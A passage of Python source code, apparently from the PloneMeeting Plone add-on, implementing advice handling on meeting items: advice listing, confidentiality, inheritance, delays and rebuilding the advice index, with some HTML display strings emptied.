terms\n stored_terms = self.getItemInitiator()\n missing_term_uids = [uid for uid in stored_terms if uid not in cfg.getOrderedItemInitiators()]\n missing_terms = []\n if missing_term_uids:\n missing_terms = uuidsToObjects(missing_term_uids, unrestricted=True)\n for org_or_hp in cfg.getOrderedItemInitiators(theObjects=True) + missing_terms:\n if org_or_hp.portal_type == 'organization':\n res.append((org_or_hp.UID(), org_or_hp.Title()))\n else:\n res.append((org_or_hp.UID(), org_or_hp.get_short_title()))\n return DisplayList(res)\n\n security.declarePrivate('getAdvices')\n\n def getAdvices(self):\n '''Returns a list of contained meetingadvice objects.'''\n res = []\n tool = api.portal.get_tool('portal_plonemeeting')\n advicePortalTypeIds = tool.getAdvicePortalTypeIds()\n for obj in self.objectValues('Dexterity Container'):\n if obj.portal_type in advicePortalTypeIds:\n res.append(obj)\n return res\n\n def _doClearDayFrom(self, date):\n '''Change the given p_date (that is a datetime instance)\n into a clear date, aka change the hours/minutes/seconds to 23:59:59.'''\n return datetime(date.year, date.month, date.day, 23, 59, 59)\n\n security.declarePublic('getAdvicesGroupsInfosForUser')\n\n def getAdvicesGroupsInfosForUser(self,\n compute_to_add=True,\n compute_to_edit=True,\n compute_power_advisers=True):\n '''This method returns 2 lists of groups in the name of which the\n currently logged user may, on this item:\n - add an advice;\n - edit or delete an advice.\n Depending on p_compute_to_add and p_compute_to_edit,\n returned list are computed or left empty.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n # Advices must be enabled\n if not cfg.getUseAdvices():\n return ([], [])\n # Logged user must be an adviser\n user_org_uids = tool.get_orgs_for_user(suffixes=['advisers'])\n if not user_org_uids:\n return ([], [])\n # Produce the lists of groups to which the user belongs and for which,\n # - no advice has been given yet (list of advices to add)\n # - an advice has already been given (list of advices to edit/delete).\n toAdd = []\n toEdit = []\n powerAdvisers = cfg.getPowerAdvisersGroups()\n itemState = self.query_state()\n for user_org_uid in user_org_uids:\n if user_org_uid in self.adviceIndex:\n advice = self.adviceIndex[user_org_uid]\n adapted = self.adapted()\n if compute_to_add and advice['type'] == NOT_GIVEN_ADVICE_VALUE and \\\n advice['advice_addable'] and \\\n adapted._adviceIsAddableByCurrentUser(user_org_uid):\n toAdd.append(user_org_uid)\n if compute_to_edit and advice['type'] != NOT_GIVEN_ADVICE_VALUE and \\\n advice['advice_editable'] and \\\n adapted._adviceIsEditableByCurrentUser(user_org_uid):\n toEdit.append(user_org_uid)\n # if not in self.adviceIndex, aka not already given\n # check if group is a power adviser and if he is allowed\n # to add an advice in current item state\n elif compute_to_add and compute_power_advisers and user_org_uid in powerAdvisers:\n # we avoid waking up the organization, we get states using\n # MeetingConfig.getItemAdviceStatesForOrg that is ram.cached\n if itemState in cfg.getItemAdviceStatesForOrg(org_uid=user_org_uid):\n toAdd.append(user_org_uid)\n return (toAdd, toEdit)\n\n def _advicePortalTypeForAdviser(self, org_uid):\n '''See doc in interfaces.py.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n extra_infos = tool.adapted().get_extra_adviser_infos()\n adviser_infos = extra_infos.get(org_uid, {})\n advice_portal_type = adviser_infos.get('portal_type', None)\n return advice_portal_type 
or 'meetingadvice'\n\n def _adviceTypesForAdviser(self, meeting_advice_portal_type):\n '''See doc in interfaces.py.'''\n item = self.getSelf()\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n return cfg.getUsedAdviceTypes()\n\n def _adviceIsViewableForCurrentUser(self,\n cfg,\n is_confidential_power_observer,\n adviceInfo):\n '''\n Returns True if current user may view the advice.\n '''\n # if confidentiality is used and advice is marked as confidential,\n # and current user is not members of the _advisers that gave advice\n # advices could be hidden to power observers and/or restricted power observers\n if cfg.getEnableAdviceConfidentiality() and adviceInfo['isConfidential']:\n advisers_group_id = get_plone_group_id(adviceInfo['id'], 'advisers')\n if advisers_group_id not in get_plone_groups_for_user() and \\\n is_confidential_power_observer:\n return False\n return True\n\n def _shownAdviceTypeFor(self, adviceInfo):\n \"\"\"Return the advice_type to take into account, essentially regarding\n the fact that the advice is 'hidden_during_redaction' or not.\"\"\"\n adviceType = None\n # if the advice is 'hidden_during_redaction', we create a specific advice type\n if not adviceInfo['hidden_during_redaction']:\n adviceType = adviceInfo['type']\n else:\n # check if advice still giveable/editable\n if adviceInfo['advice_editable']:\n adviceType = HIDDEN_DURING_REDACTION_ADVICE_VALUE\n else:\n adviceType = CONSIDERED_NOT_GIVEN_ADVICE_VALUE\n return adviceType\n\n security.declarePublic('getAdvicesByType')\n\n def getAdvicesByType(self, include_not_asked=True, ordered=True):\n '''Returns the list of advices, grouped by type.'''\n res = {}\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n is_confidential_power_observer = tool.isPowerObserverForCfg(\n cfg, cfg.getAdviceConfidentialFor())\n for groupId, adviceInfo in self.adviceIndex.iteritems():\n if not include_not_asked and adviceInfo['not_asked']:\n continue\n # make sure we do not modify original data\n adviceInfo = deepcopy(adviceInfo)\n\n # manage inherited advice\n if adviceInfo['inherited']:\n # make sure we do not modify original data, use .copy()\n adviceInfo = self.getInheritedAdviceInfo(groupId)\n adviceInfo['inherited'] = True\n # Create the entry for this type of advice if not yet created.\n # first check if current user may access advice, aka advice is not confidential to him\n if not self._adviceIsViewableForCurrentUser(\n cfg, is_confidential_power_observer, adviceInfo):\n continue\n\n adviceType = self._shownAdviceTypeFor(adviceInfo)\n if adviceType not in res:\n res[adviceType] = advices = []\n else:\n advices = res[adviceType]\n advices.append(adviceInfo.__dict__['data'])\n if ordered:\n ordered_res = {}\n\n def getKey(advice_info):\n return advice_info['name']\n for advice_type, advice_infos in res.items():\n ordered_res[advice_type] = sorted(advice_infos, key=getKey)\n res = ordered_res\n return res\n\n def couldInheritAdvice(self, adviserId, dry_run=False):\n \"\"\"For given p_adivserId, could it be set to 'inherited'?\n Not possible if advice already given.\"\"\"\n if not self.getInheritedAdviceInfo(adviserId, checkIsInherited=False):\n return False\n return True\n\n security.declarePublic('getInheritedAdviceInfo')\n\n def getInheritedAdviceInfo(self, adviserId, checkIsInherited=True):\n \"\"\"Return the eventual inherited advice (original advice) for p_adviserId.\n If p_checkIsInherited is True, it will check that current advice is actually 
inherited,\n otherwise, it will not check and return the potential inherited advice.\"\"\"\n res = None\n predecessor = self.get_predecessor()\n if not predecessor:\n return res\n\n inheritedAdviceInfo = deepcopy(predecessor.adviceIndex.get(adviserId))\n while (predecessor and\n predecessor.adviceIndex.get(adviserId) and\n predecessor.adviceIndex[adviserId]['inherited']):\n predecessor = predecessor.get_predecessor()\n inheritedAdviceInfo = deepcopy(predecessor.adviceIndex.get(adviserId))\n\n res = inheritedAdviceInfo\n res['adviceHolder'] = predecessor\n return res\n\n security.declarePublic('getGivenAdvices')\n\n def getGivenAdvices(self):\n '''Returns the list of advices that has already been given by\n computing a data dict from contained meetingadvices.'''\n # for now, only contained elements in a MeetingItem of\n # meta_type 'Dexterity Container' are meetingadvices...\n res = {}\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n for advice in self.getAdvices():\n optional = True\n gives_auto_advice_on_help_message = delay = delay_left_alert = delay_label = ''\n # find the relevant row in customAdvisers if advice has a row_id\n if advice.advice_row_id:\n customAdviserConfig = cfg._dataForCustomAdviserRowId(advice.advice_row_id)\n # cfg._findLinkedRowsFor returns as first element the fact that it is an automatic advice or not\n optional = not cfg._findLinkedRowsFor(advice.advice_row_id)[0]\n gives_auto_advice_on_help_message = customAdviserConfig['gives_auto_advice_on_help_message'] or ''\n delay = customAdviserConfig['delay'] or ''\n delay_left_alert = customAdviserConfig['delay_left_alert'] or ''\n delay_label = customAdviserConfig['delay_label'] or ''\n advice_given_on = advice.get_advice_given_on()\n res[advice.advice_group] = {'type': advice.advice_type,\n 'optional': optional,\n 'not_asked': False,\n 'id': advice.advice_group,\n 'name': get_organization(advice.advice_group).get_full_title(),\n 'advice_id': advice.getId(),\n 'advice_uid': advice.UID(),\n 'comment': advice.advice_comment and advice.advice_comment.output,\n 'observations':\n advice.advice_observations and advice.advice_observations.output,\n 'reference': advice.advice_reference,\n 'row_id': advice.advice_row_id,\n 'gives_auto_advice_on_help_message': gives_auto_advice_on_help_message,\n 'delay': delay,\n 'delay_left_alert': delay_left_alert,\n 'delay_label': delay_label,\n 'advice_given_on': advice_given_on,\n 'advice_given_on_localized':\n self.toLocalizedTime(advice_given_on),\n 'hidden_during_redaction': advice.advice_hide_during_redaction,\n }\n return res\n\n security.declarePublic('displayOtherMeetingConfigsClonableTo')\n\n def displayOtherMeetingConfigsClonableTo(self):\n '''Display otherMeetingConfigsClonableTo with eventual\n emergency and privacy informations.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n vocab = get_vocab(self, 'Products.PloneMeeting.vocabularies.other_mcs_clonable_to_vocabulary')\n\n # emergency\n emergency_msg = translate('Emergency while presenting in other MC',\n domain='PloneMeeting',\n context=self.REQUEST)\n # privacy\n secret_msg = translate('secret',\n domain='PloneMeeting',\n context=self.REQUEST)\n public_msg = translate('public',\n domain='PloneMeeting',\n context=self.REQUEST)\n\n # effective/theorical meeting informations\n effective_meeting_msg = translate('effective_meeting_help',\n domain='PloneMeeting',\n context=self.REQUEST)\n theorical_meeting_msg = translate('theorical_meeting_help',\n domain='PloneMeeting',\n 
context=self.REQUEST)\n no_meeting_available_msg = translate('no_meeting_available',\n domain='PloneMeeting',\n context=self.REQUEST)\n portal_url = api.portal.get().absolute_url()\n\n res = []\n for otherMC in self.getOtherMeetingConfigsClonableTo():\n isSecret = otherMC in self.getOtherMeetingConfigsClonableToPrivacy()\n cfgTitle = safe_unicode(vocab.getTermByToken(otherMC).title)\n displayEmergency = False\n displayPrivacy = False\n if otherMC in self.getOtherMeetingConfigsClonableToEmergency():\n displayEmergency = True\n if self.attribute_is_used('otherMeetingConfigsClonableToPrivacy'):\n displayPrivacy = True\n\n emergencyAndPrivacyInfos = []\n if displayEmergency:\n emergencyAndPrivacyInfos.append(\n u\"{0}\".format(emergency_msg))\n if displayPrivacy:\n privacyInfo = u\"{1}\".format(\n isSecret and 'secret' or 'public',\n isSecret and secret_msg or public_msg)\n emergencyAndPrivacyInfos.append(privacyInfo)\n\n # if sendable, display logical meeting into which it could be presented\n # if already sent, just display the \"sent\" information\n LOGICAL_DATE_PATTERN = u\" {2}\"\n clonedItem = self.getItemClonedToOtherMC(otherMC)\n if not clonedItem or not clonedItem.hasMeeting():\n logicalMeeting = self._otherMCMeetingToBePresentedIn(getattr(tool, otherMC))\n if logicalMeeting:\n logicalMeetingLink = logicalMeeting.get_pretty_link()\n else:\n logicalMeetingLink = no_meeting_available_msg\n iconName = 'greyedMeeting.png'\n title_help_msg = theorical_meeting_msg\n else:\n clonedItemMeeting = clonedItem.getMeeting()\n logicalMeetingLink = clonedItemMeeting.get_pretty_link()\n iconName = 'Meeting.png'\n title_help_msg = effective_meeting_msg\n\n logicalDateInfo = LOGICAL_DATE_PATTERN.format('/'.join((portal_url, iconName)),\n title_help_msg,\n logicalMeetingLink)\n\n tmp = u\"{0} ({1})\".format(cfgTitle, \" - \".join(emergencyAndPrivacyInfos + [logicalDateInfo]))\n res.append(tmp)\n return u\", \".join(res) or \"-\"\n\n def displayOtherMeetingConfigsClonableToPossibleValues(self):\n '''Display otherMeetingConfigsClonableTo possible values.'''\n vocab = get_vocab(self, 'Products.PloneMeeting.vocabularies.other_mcs_clonable_to_vocabulary')\n return u\", \".join([safe_unicode(term.title) for term in vocab._terms]) or \"-\"\n\n security.declarePublic('showAdvices')\n\n def showAdvices(self):\n \"\"\"This controls if advices need to be shown on the item view.\"\"\"\n item = self.getSelf()\n\n # something in adviceIndex?\n if bool(item.adviceIndex):\n return True\n\n # MeetingConfig using advices?\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n if cfg.getUseAdvices():\n return True\n\n return False\n\n def _realCopyGroupId(self, groupId):\n \"\"\"Return the real group id, especially if given p_groupId\n is an auto copy group.\"\"\"\n return groupId.split(AUTO_COPY_GROUP_PREFIX)[-1]\n\n security.declarePublic('displayCopyGroups')\n\n def displayCopyGroups(self):\n '''Display copy groups on the item view, especially the link showing users of a group.'''\n portal_url = api.portal.get().absolute_url()\n copyGroupsVocab = get_vocab(\n self,\n self.getField('copyGroups').vocabulary_factory,\n **{'include_auto': True, })\n res = []\n allCopyGroups = self.getAllCopyGroups()\n for term in copyGroupsVocab._terms:\n if term.value not in allCopyGroups:\n continue\n # auto copyGroups are prefixed with AUTO_COPY_GROUP_PREFIX\n real_group_id = self._realCopyGroupId(term.value)\n res.append(u'{0} {1}'.format(\n # highlight [auto]\n term.title.replace(\n u'[auto]',\n 
u'[auto]'.format(\n                    translate('This copy group was set automatically by the application',\n                              domain='PloneMeeting',\n                              context=self.REQUEST))),\n                u\"\"\n                u\"\"\n                .format(real_group_id, portal_url)))\n        return u', '.join(res)\n\n    def _displayAdviserUsers(self, userids, portal_url, tool):\n        \"\"\" \"\"\"\n        userid_pattern = u'{2}'\n        rendered_users = []\n        help_msg = translate(\"adviser_userid_notified\",\n                             domain=\"PloneMeeting\",\n                             context=self.REQUEST)\n        for userid in userids:\n            rendered_users.append(\n                userid_pattern.format(\n                    escape(help_msg),\n                    portal_url,\n                    safe_unicode(tool.getUserName(userid))))\n        res = u\", \".join(rendered_users)\n        return res\n\n    security.declarePublic('displayAdvisers')\n\n    def displayAdvisers(self):\n        '''Display advisers on the item view, especially the link showing users of a group.'''\n\n        portal_url = api.portal.get().absolute_url()\n        tool = api.portal.get_tool('portal_plonemeeting')\n\n        def _get_adviser_name(adviser):\n            \"\"\"Manage adviser name, will append selected __userid__ if any.\"\"\"\n            name = html.escape(adviser['name'])\n            if adviser['delay_label']:\n                name += u\" - {0} ({1})\".format(\n                    safe_unicode(html.escape(adviser['delay_label'])),\n                    safe_unicode(adviser['delay']))\n            if adviser['userids']:\n                name += u\" ({0})\".format(\n                    self._displayAdviserUsers(adviser['userids'], portal_url, tool))\n            return name\n\n        advisers_by_type = self.getAdvicesByType(include_not_asked=False)\n        res = []\n        auto_advice = u' [auto]'.format(\n            translate('This advice was asked automatically by the application',\n                      domain='PloneMeeting',\n                      context=self.REQUEST))\n        for advice_type, advisers in advisers_by_type.items():\n            for adviser in advisers:\n                adviser_name = _get_adviser_name(adviser)\n                value = u\"{0} \" \\\n                    u\"\".format(\n                        adviser_name + (not adviser['optional'] and auto_advice or u''),\n                        get_plone_group_id(adviser['id'], 'advisers'),\n                        portal_url)\n                res.append(value)\n        return u', '.join(res)\n\n    security.declarePublic('hasAdvices')\n\n    def hasAdvices(self, toGive=False, adviceIdsToBypass={}):\n        '''Is there at least one given advice on this item?\n           If p_toGive is True, it instead returns whether there\n           is still an advice to be given.\n           If some p_adviceIdsToBypass are given, these will not be taken\n           into account as giveable.\n           p_adviceIdsToBypass is a dict containing the advice to give as\n           key and the fact that advice is optional as value, so :\n           {'adviser_group_id': True}.'''\n        for advice in self.adviceIndex.itervalues():\n            if advice['id'] in adviceIdsToBypass and \\\n               adviceIdsToBypass[advice['id']] == advice['optional']:\n                continue\n            if (toGive and advice['type'] in (NOT_GIVEN_ADVICE_VALUE, 'asked_again')) or \\\n               (not toGive and not advice['type'] in (NOT_GIVEN_ADVICE_VALUE, 'asked_again')):\n                return True\n\n        return False\n\n    security.declarePublic('hasAdvice')\n\n    def hasAdvice(self, org_uid):\n        '''Returns True if someone from p_org_uid has given an advice on this item.'''\n        if (org_uid in self.adviceIndex) and \\\n           (self.adviceIndex[org_uid]['type'] != NOT_GIVEN_ADVICE_VALUE):\n            return True\n\n    security.declarePublic('willInvalidateAdvices')\n\n    def willInvalidateAdvices(self):\n        '''Returns True if at least one advice has been defined on this item\n           and advice invalidation has been enabled in the meeting\n           configuration.'''\n        if self.isTemporary():\n            return False\n        tool = api.portal.get_tool('portal_plonemeeting')\n        cfg = tool.getMeetingConfig(self)\n        if cfg.getEnableAdviceInvalidation() and self.hasAdvices() \\\n           and (self.query_state() in 
cfg.getItemAdviceInvalidateStates()):\n return True\n return False\n\n security.declarePrivate('enforceAdviceMandatoriness')\n\n def enforceAdviceMandatoriness(self):\n '''Checks in the configuration if we must enforce advice mandatoriness.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n meetingConfig = tool.getMeetingConfig(self)\n if meetingConfig.getUseAdvices() and \\\n meetingConfig.getEnforceAdviceMandatoriness():\n return True\n return False\n\n security.declarePrivate('mandatoryAdvicesAreOk')\n\n def mandatoryAdvicesAreOk(self):\n '''Returns True if all mandatory advices for this item have been given and are all positive.'''\n if not hasattr(self, 'isRecurringItem'):\n for advice in self.adviceIndex.itervalues():\n if not advice['optional'] and \\\n not advice['type'].startswith('positive'):\n return False\n return True\n\n security.declarePublic('getAdviceDataFor')\n\n def getAdviceDataFor(self,\n item,\n adviser_uid=None,\n hide_advices_under_redaction=True,\n show_hidden_advice_data_to_group_advisers=True,\n ordered=False):\n '''Returns data info for given p_adviser_uid adviser uid.\n If no p_adviser_uid is given, every advice infos are returned.\n If p_hide_advices_under_redaction is True, we hide relevant informations of\n advices hidden during redaction but if p_show_hidden_advice_data_to_group_advisers\n is True, the advisers of the hidden advices will see the data.\n We receive p_item as the current item to be sure that this public\n method can not be called thru the web (impossible to pass an object as parameter),\n but it is still callable using a Script (Python) or useable in a TAL expression...\n If ordered=True, return an OrderedDict sorted by adviser name.'''\n if not isinstance(item, MeetingItem) or not item.UID() == self.UID():\n raise Unauthorized\n\n data = {}\n tool = api.portal.get_tool('portal_plonemeeting')\n adviser_org_uids = tool.get_orgs_for_user(suffixes=['advisers'])\n for adviceInfo in self.adviceIndex.values():\n advId = adviceInfo['id']\n # if advice is inherited get real adviceInfo\n if adviceInfo['inherited']:\n adviceInfo = self.getInheritedAdviceInfo(advId)\n adviceInfo['inherited'] = True\n # turn adviceInfo PersistentMapping into a dict\n data[advId] = dict(adviceInfo)\n # hide advice data if relevant\n if hide_advices_under_redaction and \\\n data[advId][HIDDEN_DURING_REDACTION_ADVICE_VALUE] and \\\n (not show_hidden_advice_data_to_group_advisers or\n (show_hidden_advice_data_to_group_advisers and\n advId not in adviser_org_uids)):\n advice_type = self._shownAdviceTypeFor(adviceInfo)\n if advice_type == HIDDEN_DURING_REDACTION_ADVICE_VALUE:\n msgid = 'advice_hidden_during_redaction_help'\n else:\n msgid = 'advice_hidden_during_redaction_considered_not_given_help'\n data[advId]['type'] = advice_type\n msg = translate(\n msgid=msgid,\n domain='PloneMeeting',\n context=self.REQUEST)\n data[advId]['comment'] = msg\n data[advId]['observations'] = msg\n\n # optimize some saved data\n data[advId]['type_translated'] = translate(data[advId]['type'],\n domain='PloneMeeting',\n context=self.REQUEST)\n # add meetingadvice object if given\n adviceHolder = adviceInfo.get('adviceHolder', self)\n given_advice = adviceHolder.getAdviceObj(advId)\n data[advId]['given_advice'] = given_advice\n data[advId]['creator_id'] = None\n data[advId]['creator_fullname'] = None\n if given_advice:\n creator_id = given_advice.Creator()\n creator_fullname = tool.getUserName(creator_id)\n data[advId]['creator_id'] = creator_id\n data[advId]['creator_fullname'] = 
creator_fullname\n\n if adviser_uid:\n data = data.get(adviser_uid, {})\n\n if ordered and data:\n # sort by adviser name\n data_as_list = data.items()\n data_as_list.sort(key=lambda x: x[1]['name'])\n data = OrderedDict(data_as_list)\n return data\n\n def getAdviceObj(self, adv_uid):\n \"\"\"Return the advice object for given p_adv_uid.\n If advice object does not exist, None is returned.\"\"\"\n adviceObj = None\n advices = self.getAdvices()\n # get the advice without using self.adviceIndex because\n # getAdviceObj may be called during self.adviceIndex computation\n for advice in advices:\n if advice.advice_group == adv_uid:\n adviceObj = advice\n break\n return adviceObj\n\n def _grantPermissionToRole(self, permission, role_to_give, obj):\n \"\"\"\n Grant given p_permission to given p_role_to_give on given p_obj.\n If p_obj is None, w\n \"\"\"\n roles = rolesForPermissionOn(permission, obj)\n if role_to_give not in roles:\n # cleanup roles as the permission is also returned with a leading '_'\n roles = [role for role in roles if not role.startswith('_')]\n roles = roles + [role_to_give, ]\n obj.manage_permission(permission, roles)\n\n def _removePermissionToRole(self, permission, role_to_remove, obj):\n \"\"\"Remove given p_permission to given p_role_to_remove on given p_obj.\"\"\"\n roles = rolesForPermissionOn(permission, obj)\n if role_to_remove in roles:\n # cleanup roles as the permission is also returned with a leading '_'\n roles = [role for role in roles if not role.startswith('_')]\n if role_to_remove in roles:\n roles.remove(role_to_remove)\n obj.manage_permission(permission, roles)\n\n def _removeEveryContainedAdvices(self, suppress_events=True):\n \"\"\"Remove every contained advices.\"\"\"\n for advice in self.getAdvices():\n self._delObject(advice.getId(), suppress_events=suppress_events)\n\n def _adviceDelayIsTimedOut(self, groupId, computeNewDelayInfos=False):\n \"\"\"Returns True if given p_advice is delay-aware and delay is timed out.\n If p_computeNewDelayInfos is True, we will not take delay_infos from the\n adviceIndex but call getDelayInfosForAdvice to get fresh data.\"\"\"\n if not self.adviceIndex[groupId]['delay']:\n return False\n # in some case, when creating advice, if adviserIndex is reindexed before\n # _updateAdvices is finished, we do not have the 'delay_infos' in the adviceIndex\n # in this case, no matter p_computeNewDelayInfos we use getDelayInfosForAdvice\n if computeNewDelayInfos or 'delay_infos' not in self.adviceIndex[groupId]:\n delay_infos = self.getDelayInfosForAdvice(groupId)\n else:\n delay_infos = self.adviceIndex[groupId]['delay_infos']\n return delay_infos['delay_status'] == 'timed_out' or \\\n delay_infos['delay_status_when_stopped'] == 'stopped_timed_out'\n\n def _is_currently_updating_advices(self):\n \"\"\" \"\"\"\n return self.REQUEST.get('currentlyUpdatingAdvice', False)\n\n def _updateAdvices(self,\n cfg,\n item_state,\n invalidate=False,\n triggered_by_transition=None,\n inheritedAdviserUids=[]):\n '''Every time an item is created or updated, this method updates the\n dictionary self.adviceIndex: a key is added for every advice that needs\n to be given, a key is removed for every advice that does not need to\n be given anymore. 
If p_invalidate = True, it means that advice\n invalidation is enabled and someone has modified the item: it means\n that all advices will be NOT_GIVEN_ADVICE_VALUE again.\n If p_triggered_by_transition is given, we know that the advices are\n updated because of a workflow transition, we receive the transition name.\n WARNING : this method is a sub-method of self.update_local_roles and is not supposed\n to be called separately unless you know what you are doing! Indeed, as this method involves\n localRoles management, various methods update localRoles sometimes same localRoles.'''\n # bypass advice update if we are pasting items containing advices\n if self.REQUEST.get('currentlyPastingItems', False):\n return\n\n # declare that we are currently updating advices\n # because some subprocess like events could call it again\n # leading to some inconsistency...\n self.REQUEST.set('currentlyUpdatingAdvice', True)\n\n old_adviceIndex = deepcopy(self.adviceIndex.data)\n\n isDefinedInTool = self.isDefinedInTool()\n if isDefinedInTool:\n self.adviceIndex = PersistentMapping()\n plone_utils = api.portal.get_tool('plone_utils')\n\n # check if the given p_triggered_by_transition transition name\n # is the transition that will restart delays\n isTransitionReinitializingDelays = triggered_by_transition in \\\n cfg.getTransitionsReinitializingDelays()\n\n # add a message for the user\n if isTransitionReinitializingDelays:\n plone_utils.addPortalMessage(\n translate('advices_delays_reinitialized',\n domain=\"PloneMeeting\",\n context=self.REQUEST),\n type='info')\n\n # Invalidate advices if needed\n if invalidate:\n # Invalidate all advices. Send notification mail(s) if configured.\n for org_uid, adviceInfo in self.adviceIndex.iteritems():\n advice_obj = self.getAdviceObj(adviceInfo['id'])\n if advice_obj:\n # Send a mail to the group that can give the advice.\n if 'adviceInvalidated' in cfg.getMailItemEvents():\n plone_group_id = get_plone_group_id(org_uid, 'advisers')\n sendMailIfRelevant(self,\n 'adviceInvalidated',\n [plone_group_id],\n isGroupIds=True)\n plone_utils.addPortalMessage(translate('advices_invalidated',\n domain=\"PloneMeeting\",\n context=self.REQUEST),\n type='info')\n # remove every meetingadvice from self\n self._removeEveryContainedAdvices(suppress_events=False)\n\n # manage inherited advices\n inheritedAdviserUids = inheritedAdviserUids or [\n org_uid for org_uid in self.adviceIndex\n if self.adviceIndex[org_uid].get('inherited', False)]\n\n # Update the dictionary self.adviceIndex with every advices to give\n i = -1\n # we will recompute the entire adviceIndex\n # just save some data that are only in the adviceIndex :\n # 'delay_started_on'\n # 'delay_stopped_on'\n # 'delay_for_automatic_adviser_changed_manually'\n saved_stored_data = {}\n adapted = self.adapted()\n for org_uid, adviceInfo in self.adviceIndex.iteritems():\n saved_stored_data[org_uid] = {}\n reinit_delay = adapted._adviceDelayWillBeReinitialized(\n org_uid, adviceInfo, isTransitionReinitializingDelays)\n if reinit_delay or org_uid in inheritedAdviserUids:\n saved_stored_data[org_uid]['delay_started_on'] = None\n saved_stored_data[org_uid]['delay_stopped_on'] = None\n else:\n saved_stored_data[org_uid]['delay_started_on'] = 'delay_started_on' in adviceInfo and \\\n adviceInfo['delay_started_on'] or None\n saved_stored_data[org_uid]['delay_stopped_on'] = 'delay_stopped_on' in adviceInfo and \\\n adviceInfo['delay_stopped_on'] or None\n saved_stored_data[org_uid]['delay_for_automatic_adviser_changed_manually'] = \\\n 
'delay_for_automatic_adviser_changed_manually' in adviceInfo and \\\n adviceInfo['delay_for_automatic_adviser_changed_manually'] or False\n saved_stored_data[org_uid]['delay_changes_history'] = \\\n 'delay_changes_history' in adviceInfo and \\\n adviceInfo['delay_changes_history'] or []\n saved_stored_data[org_uid]['proposing_group_comment'] = \\\n adviceInfo.get('proposing_group_comment', u'')\n saved_stored_data[org_uid]['inherited'] = \\\n 'inherited' in adviceInfo and \\\n adviceInfo['inherited'] or bool(org_uid in inheritedAdviserUids)\n if 'isConfidential' in adviceInfo:\n saved_stored_data[org_uid]['isConfidential'] = adviceInfo['isConfidential']\n else:\n saved_stored_data[org_uid]['isConfidential'] = cfg.getAdviceConfidentialityDefault()\n\n # Compute automatic\n # no sense to compute automatic advice on items defined in the configuration\n if isDefinedInTool:\n automaticAdvisers = []\n else:\n # here, there are still no 'Reader' access for advisers to the item\n # make sure the automatic advisers (where a TAL expression is evaluated)\n # may access the item correctly\n with api.env.adopt_roles(['Manager', ]):\n automaticAdvisers = self.getAutomaticAdvisersData()\n # get formatted optionalAdvisers to be coherent with automaticAdvisers data format\n optionalAdvisers = self.getOptionalAdvisersData()\n # now get inherited advices that are not in optional advisers and\n # automatic advisers, it is the case for not_asked advices or when sending\n # an item to another MC\n handledAdviserUids = [optAdviser['org_uid'] for optAdviser in optionalAdvisers\n if optAdviser['org_uid'] not in inheritedAdviserUids]\n handledAdviserUids += [autoAdviser['org_uid'] for autoAdviser in automaticAdvisers\n if autoAdviser['org_uid'] not in inheritedAdviserUids]\n # when inheritedAdviserUids, adviceIndex is empty\n unhandledAdviserUids = [org_uid for org_uid in inheritedAdviserUids\n if org_uid not in handledAdviserUids]\n # if we have an adviceIndex, check that every inherited adviserIds are handled\n unhandledAdviserUids += [\n org_uid for org_uid in self.adviceIndex\n if self.adviceIndex[org_uid].get('inherited', False) and\n org_uid not in handledAdviserUids]\n if unhandledAdviserUids:\n optionalAdvisers += self.getUnhandledInheritedAdvisersData(\n unhandledAdviserUids, optional=True)\n automaticAdvisers += self.getUnhandledInheritedAdvisersData(\n unhandledAdviserUids, optional=False)\n # we keep the optional and automatic advisers separated because we need\n # to know what advices are optional or not\n # if an advice is in both optional and automatic advisers, the automatic is kept\n self.adviceIndex = PersistentMapping()\n for adviceType in (optionalAdvisers, automaticAdvisers):\n i += 1\n optional = (i == 0)\n for adviceInfo in adviceType:\n # We create an empty dictionary that will store advice info\n # once the advice will have been created. 
But for now, we already\n # store known infos coming from the configuration and from selected otpional advisers\n org_uid = adviceInfo['org_uid']\n self.adviceIndex[org_uid] = d = PersistentMapping()\n d['type'] = NOT_GIVEN_ADVICE_VALUE\n d['optional'] = optional\n d['not_asked'] = False\n d['id'] = org_uid\n d['name'] = get_organization(org_uid).get_full_title()\n d['comment'] = None\n d['delay'] = adviceInfo['delay']\n d['delay_left_alert'] = adviceInfo['delay_left_alert']\n d['delay_label'] = adviceInfo['delay_label']\n d['gives_auto_advice_on_help_message'] = \\\n adviceInfo['gives_auto_advice_on_help_message']\n d['row_id'] = adviceInfo['row_id']\n d['hidden_during_redaction'] = False\n # manage the 'delay_started_on' data that was saved prior\n if adviceInfo['delay'] and \\\n org_uid in saved_stored_data and \\\n adapted._adviceDelayMayBeStarted(org_uid):\n d['delay_started_on'] = saved_stored_data[org_uid]['delay_started_on']\n else:\n d['delay_started_on'] = None\n # manage stopped delay\n if org_uid in saved_stored_data:\n d['delay_stopped_on'] = saved_stored_data[org_uid]['delay_stopped_on']\n else:\n d['delay_stopped_on'] = None\n # advice_given_on will be filled by already given advices\n d['advice_given_on'] = None\n d['advice_given_on_localized'] = None\n # save the fact that a delay for an automatically asked advice\n # was changed manually. Indeed, we need to know it because at next advice update,\n # the normally auto asked advice must not interfer this manually managed advice.\n # This is the case if some delay-aware auto advice are linked together using the\n # 'is_linked_to_previous_row' on the MeetingConfig.customAdvisers\n if org_uid in saved_stored_data:\n d['delay_for_automatic_adviser_changed_manually'] = \\\n saved_stored_data[org_uid]['delay_for_automatic_adviser_changed_manually']\n d['delay_changes_history'] = saved_stored_data[org_uid]['delay_changes_history']\n d['isConfidential'] = saved_stored_data[org_uid]['isConfidential']\n d['inherited'] = saved_stored_data[org_uid]['inherited']\n d['proposing_group_comment'] = \\\n saved_stored_data[org_uid]['proposing_group_comment']\n else:\n d['delay_for_automatic_adviser_changed_manually'] = False\n d['delay_changes_history'] = []\n d['isConfidential'] = cfg.getAdviceConfidentialityDefault()\n d['inherited'] = bool(org_uid in inheritedAdviserUids)\n d['proposing_group_comment'] = u''\n # index view/add/edit access\n d['item_viewable_by_advisers'] = False\n d['advice_addable'] = False\n d['advice_editable'] = False\n # userids\n d['userids'] = adviceInfo['userids']\n\n # now update self.adviceIndex with given advices\n 